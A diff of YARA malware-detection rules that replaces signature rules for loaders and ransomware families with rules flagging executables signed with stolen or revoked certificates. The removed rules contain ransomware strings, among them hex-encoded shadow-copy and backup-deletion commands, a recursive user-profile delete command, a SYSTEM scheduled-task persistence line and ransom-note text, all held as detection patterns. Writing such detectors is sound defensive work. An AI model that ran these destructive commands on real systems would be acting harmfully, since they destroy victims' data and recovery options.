-		logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb"
+		logic_hash = "9c7b9b6827e10a8c2a6d771d14068a074104683fe75f24dea85c5bf3f3bc04db"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "'.Replace('" ascii nocase
-		$s2 = "'aspnet_compiler.exe'" ascii
-		$s3 = "[Byte[]]$" ascii
-		$pe1 = "(77,90," ascii
-		$pe2 = "='4D5A" ascii
+		tags = "FILE"
+		thumbprint = "ab4b30913895d8df383fdadebc29d2e04a5c854bc4172c0d41bcbef176e8f37e"
+		reason = "RecordBreaker"
+		importance = 20
 
 	condition:
-		all of ( $s* ) and ( #pe1 > 1 or #pe2 > 1 ) and #s1 > 4
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOTUL SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "a3:2f:3b:a2:29:70:4a:d4:00:47:3f:74:79:e4:c3:e4" )
 }
-rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Ab74A2Ebf93447Adb83554B5564Fe03 : FILE
 {
 	meta:
-		description = "Detects PE loader / injector. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "262dedee-05d2-5783-b0ff-24470d310ab8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4936-L4950"
+		id = "1b0be137-ddcf-5215-9cb0-d687d7b6ca6c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7786-L7799"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d"
+		logic_hash = "8dbc549ecaf1cb3f07486bac7ed265882af4b6b29b9772736118490eb9233303"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "commandLine'" fullword ascii
-		$s2 = "RunPe.dll" fullword ascii
-		$s3 = "HandleRun" fullword ascii
-		$s4 = "inheritHandles" fullword ascii
-		$s5 = "BlockCopy" fullword ascii
-		$s6 = "WriteProcessMemory" fullword ascii
-		$s7 = "startupInfo" fullword ascii
+		thumbprint = "8ed289fcc40bbc150a52b733123f6094ccfb2c499d6e932b0d9a6001490fb7e6"
+		reason = "RedLineStealer"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMPERIOUS TECHNOLOGIES LIMITED" and pe.signatures [ i ] . serial == "3a:b7:4a:2e:bf:93:44:7a:db:83:55:4b:55:64:fe:03" )
 }
-rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_90212473C706F523Fe84Bdb9A78A01F4 : FILE
 {
 	meta:
-		description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "09823302-34e0-5283-9740-1475ab8077be"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4952-L4963"
+		id = "f195cf1e-4e01-51ec-ae12-21ff56dd58e2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7801-L7814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700"
+		logic_hash = "8cd1e984bb81f071053614ae9d037d7ff5e01fb95aaa0474492386a7b5faecec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Managament.inf" fullword ascii
-		$x2 = "rOnAlDo" fullword ascii
-		$x3 = "untimeResourceSet" fullword ascii
-		$x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii
+		thumbprint = "6b18e9451c2e93564ed255e754b7e1cf0f817abda93015b21ae5e247c75f9d03"
+		reason = "Cerber"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMUS, OOO" and pe.signatures [ i ] . serial == "90:21:24:73:c7:06:f5:23:fe:84:bd:b9:a7:8a:01:f4" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e3450f93-7c57-5386-a901-bc5e710657a4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4965-L4975"
+		id = "f79e1a89-c7b4-5390-b20b-3f563f409cfe"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7816-L7829"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567"
+		logic_hash = "da76d86509aee2f9cac992e6b081dce5e68c747ad34abd2daeb32e6e390b880b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920122"
-		snort3_sid = "920119"
-
-	strings:
-		$pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide
+		thumbprint = "285925b7c7c692f8d71d980dcf2ddb4c208a0f7b826ead34db402755d1a0f6de"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $pat and #pat > 1
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" )
 }
-rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2A2F270535C2D5E7630720Fb229B5D1C : FILE
 {
 	meta:
-		description = "Detects DoejoCrypt / DearCry ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4977-L4993"
+		id = "3ed98546-92b2-5566-9716-ae8209ece9d6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7831-L7844"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0"
+		logic_hash = "7d9785c12d2d744fbafab009edfb1ef232eadcdbc8eee99d0ad0daacabbabf26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DEARCRY!" fullword ascii
-		$s2 = ".CRYPT" fullword ascii
-		$s3 = "\\EncryptFile -svcV2\\" ascii
-		$s4 = "please send me the following hash!" ascii
-		$s5 = "dear!!!" fullword ascii
-		$s6 = "/readme.txt" fullword ascii
-		$o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff }
-		$o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a }
-		$o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 }
+		thumbprint = "73a0cc4495a49492806b970fd844a0ab078126930305d22c7bf68b43c337fc1a"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and ( 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOZUZ SP. Z O.O." and pe.signatures [ i ] . serial == "2a:2f:27:05:35:c2:d5:e7:63:07:20:fb:22:9b:5d:1c" )
 }
-rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4659Fa5Fc1E0397Df79Fd6A4083D93B0 : FILE
 {
 	meta:
-		description = "Detects SunShuttle / GoldMax"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4995-L5017"
+		id = "a0d2449c-c1b0-5e6a-9fa3-d8fe8e318c62"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7846-L7859"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0"
+		logic_hash = "6d8a10d77e63d2a62ce45606dd9a317220aa124a50fa95028a45d9f5899ec6e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "fa5f2dbe813b0270b1f9e53da1be024fb495e8b1848bb3c9c7392a40c8f7e8e6"
+		reason = "RedLineStealer"
+		importance = 20
 
-	strings:
-		$s1 = "main.beaconing" fullword ascii
-		$s2 = "main.clean_file" fullword ascii
-		$s3 = "main.decrypt" fullword ascii
-		$s4 = "main.define_internal_settings" fullword ascii
-		$s5 = "main.delete_empty" fullword ascii
-		$s6 = "main.encrypt" fullword ascii
-		$s7 = "main.false_requesting" fullword ascii
-		$s8 = "main.removeBase64Padding" fullword ascii
-		$s9 = "main.resolve_command" fullword ascii
-		$s10 = "main.retrieve_session_key" fullword ascii
-		$s11 = "main.save_internal_settings" fullword ascii
-		$s12 = "main.send_command_result" fullword ascii
-		$s13 = "main.send_file_part" fullword ascii
-		$s14 = "main.wget_file" fullword ascii
-		$s15 = "main.write_file" fullword ascii
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incuber Services LLP" and pe.signatures [ i ] . serial == "46:59:fa:5f:c1:e0:39:7d:f7:9f:d6:a4:08:3d:93:b0" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_651F3E5B491B197D20C49B9C7B25B775 : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "fb8b4a88-631b-5a5c-ab36-286b74a3a346"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7861-L7874"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "fe06e8f6fd87d5a9044a6ff609da73b7d9e7d1f07cc9e84ee2fd2940be615323"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "0ee11d5917c486b7a57b7c3c566acec251170e98a577164f36b7d7d34f035499"
+		reason = "NetSupport"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhynedahll Software LLC" and pe.signatures [ i ] . serial == "65:1f:3e:5b:49:1b:19:7d:20:c4:9b:9c:7b:25:b7:75" )
 }
-rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_67936A84Bed66Ef021Dbe771De331772 : FILE
 {
 	meta:
-		description = "Detects RanzyLocker / REntS ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5019-L5042"
+		id = "2739308a-7396-5fe2-bf1b-fe7e6e5d1f80"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7876-L7889"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577"
+		logic_hash = "da149e6835be937e0bf2763052d4cbabb367910061aec3c394dffaa45d9b0ac6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
-		$hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii
-		$hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
-		$hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$hx3 = "227375626964223A22" ascii
-		$hx4 = "226E6574776F726B223A22" ascii
-		$hx5 = "726561646D652E747874" ascii
-		$hx6 = "-nolan" fullword wide
-		$o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b }
-		$o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 }
-		$o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 }
-		$o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 }
+		thumbprint = "8fff75906628b764e99a7a028112a8ec7794097e564f0f897c24c2baaa82ded8"
+		reason = "IcedID"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $hx* ) or ( 2 of ( $hr* ) and 2 of ( $hx* ) ) or ( all of ( $o* ) and 2 of ( $h* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APEX SOFTWARE DESIGN, LLC" and pe.signatures [ i ] . serial == "67:93:6a:84:be:d6:6e:f0:21:db:e7:71:de:33:17:72" )
 }
-rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_8538A6C5018F50Fc : FILE
 {
 	meta:
-		description = "Detects WobbyChipMBR / Covid-21 ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "581fbce1-128d-5323-a259-14d9bfdf09b1"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5044-L5060"
+		id = "8790c06a-3b7a-5e40-9a9c-0f2064029daf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7891-L7904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351"
+		logic_hash = "2ef3c7a45eb1d46e6c159ec9692fa5c17ff7679f41d96d04de52aa52ce96fa6b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide
-		$x2 = "Reinstalling Windows has been blocked" ascii wide
-		$x3 = "Enter Decryption Key:" ascii wide
-		$x4 = "encrypted with military grade encryption" ascii wide
-		$s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii
-		$s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide
-		$s3 = "DumpHex" fullword ascii
-		$s4 = "TFTP Error" fullword wide
-		$s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide
+		thumbprint = "d42519dac24abc5c1ebfc6e0da0fd2e7cfb9db50c0598948c6630fdc132c7f94"
+		reason = "Malware"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trading Technologies International, Inc." and pe.signatures [ i ] . serial == "85:38:a6:c5:01:8f:50:fc" )
 }
-rule DITEKSHEN_MALWARE_Win_Snatch : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fecc3B3C675F7Ffd7De22507F3Fdacd7 : FILE
 {
 	meta:
-		description = "Detects Snatch / GoRansome / MauriGo ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "00dce673-b909-571f-8117-c5d4ce73fb31"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5062-L5091"
+		id = "b91a7dcd-6212-5750-9bc8-0eb37d9e129b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7906-L7919"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc"
+		logic_hash = "1319f4ccb5ab07c1c538d6a183fa25726b3d42192eaa878a2c402be2c93219f7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.encryptFile" ascii
-		$s2 = "main.encryptFileExt" ascii
-		$s3 = "main.deleteShadowCopy" ascii
-		$s4 = "main.Shadow" fullword ascii
-		$s5 = "main.RecoverMe" fullword ascii
-		$s6 = "main.EncryptWithPublicKey" ascii
-		$s7 = "main.EncoderLookupDir" fullword ascii
-		$s8 = "main.ALIGNUP" fullword ascii
-		$s9 = "main.encrypt" fullword ascii
-		$s10 = "github.com/mauri870/ransomware" ascii
-		$m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii
-		$m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii
-		$m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii
-		$m4 = ":HELP FEEED A CHILD:" ascii
-		$m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii
-		$m6 = "YOUR IDENTIFICATION : %s" ascii
-		$m7 = "convince you of our honesty" ascii
-		$m8 = "use TOR browser to talk with support" ascii
-		$m9 = "encrypted and attackers are taking" ascii
-		$p1 = "/Go/src/kitty/kidrives/" ascii
-		$p2 = "/LGoGo/encoder.go" ascii nocase
-		$p3 = "/Go/src/kitty/kidata/" ascii
+		thumbprint = "6b8cc2be066ff0bf1d884892fc600482fc34eaddb3a5e6681b509d64795b01d4"
+		reason = "RemcosRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $m* ) or ( 1 of ( $m* ) and 1 of ( $s* ) ) or ( all of ( $p* ) and ( 1 of ( $s* ) or 1 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gromit Electronics Limited" and pe.signatures [ i ] . serial == "fe:cc:3b:3c:67:5f:7f:fd:7d:e2:25:07:f3:fd:ac:d7" )
 }
-rule DITEKSHEN_MALWARE_Win_Meteorite : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5294F0F841F29855E33A18402421949A : FILE
 {
 	meta:
-		description = "Detects Meteorite downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5093-L5109"
+		id = "3153f039-afd2-5eb5-b090-b205d9778eb7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7921-L7934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f"
+		logic_hash = "b9d2b10c4117de276cb41148b41921115f414aa17e261956c8550adf6127d5b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "MeteoriteDownloader" fullword ascii wide
-		$x2 = "Meteorite Downloader" fullword ascii wide
-		$x3 = "Meteorite Downloader v" wide
-		$s1 = "regwrite" fullword wide
-		$s2 = "urlmon" fullword ascii
-		$s3 = "wscript.shell" fullword wide
-		$s4 = "modMain" fullword ascii
-		$s5 = "VBA6.DLL" fullword ascii
-		$s6 = "^_http" ascii
+		thumbprint = "df744f6b9430237821e3f2bc6edafb4a92354dda1734a60d5e0d816256aefb47"
+		reason = "RemcosRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Integrated Plotting Solutions Limited" and pe.signatures [ i ] . serial == "52:94:f0:f8:41:f2:98:55:e3:3a:18:40:24:21:94:9a" )
 }
-rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1614Ef66B2C4B886E71A93Dd34869F48 : FILE
 {
 	meta:
-		description = "Detects LegionLocker ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5111-L5129"
+		id = "27bead15-f7fa-55a1-9347-ea551e1e0e18"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7936-L7949"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045"
+		logic_hash = "26265d54d8b58128c1a9a3b322f339d1beb438f403637519b11ff324af91d1e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$m1 = "+Do not run task manager, powershell, cmd etc." ascii wide
-		$m2 = "3 hours your files will be deleted." ascii wide
-		$m3 = "files have been encrypted by Legion Locker" ascii wide
-		$s1 = "passwordBytes" fullword ascii
-		$s2 = "_start_enc_" ascii
-		$s3 = "_del_desktop_" ascii
-		$s4 = "Processhacker" wide
-		$s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide
-		$s6 = "Submit code" fullword wide
-		$pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii
-		$pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii
+		thumbprint = "1689697e08dda6d1233c0056078ddf25b12c3608ead7d96ed4cbbb074e54ce29"
+		reason = "RemcosRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $m* ) or 1 of ( $pdb* ) or 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHIRT AND CUFF LIMITED" and pe.signatures [ i ] . serial == "16:14:ef:66:b2:c4:b8:86:e7:1a:93:dd:34:86:9f:48" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65Cfd8419D70Ce4011D97Bc79D18315E : FILE
 {
 	meta:
-		description = "Detects Go-based downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e16ccb89-2eb6-5457-a88e-f802f3c35764"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5131-L5144"
+		id = "2368b3d1-1cd5-575b-a3ff-270349563d1a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7951-L7964"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0"
+		logic_hash = "675ab6ef0f744f62db892992c6b3614e14b95f64e2800a0d10e55b915a2b4e74"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.downloadFile" fullword ascii
-		$s2 = "main.fetchFiles" fullword ascii
-		$s3 = "main.createDefenderAllowanceException" fullword ascii
-		$s4 = "main.unzip" fullword ascii
-		$s5 = "HideWindow" fullword ascii
-		$s6 = "/go/src/installwrap/main.go" ascii
+		thumbprint = "7cff10e37a43843e971f02ca6ad6510f08a5209d21745181fc4d003a8287cd1b"
+		reason = "BumbleBee"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FACE AESTHETICS LTD" and pe.signatures [ i ] . serial == "65:cf:d8:41:9d:70:ce:40:11:d9:7b:c7:9d:18:31:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_01Cf0B0F01B20B70Bfaa69722979Ef5C : FILE
 {
 	meta:
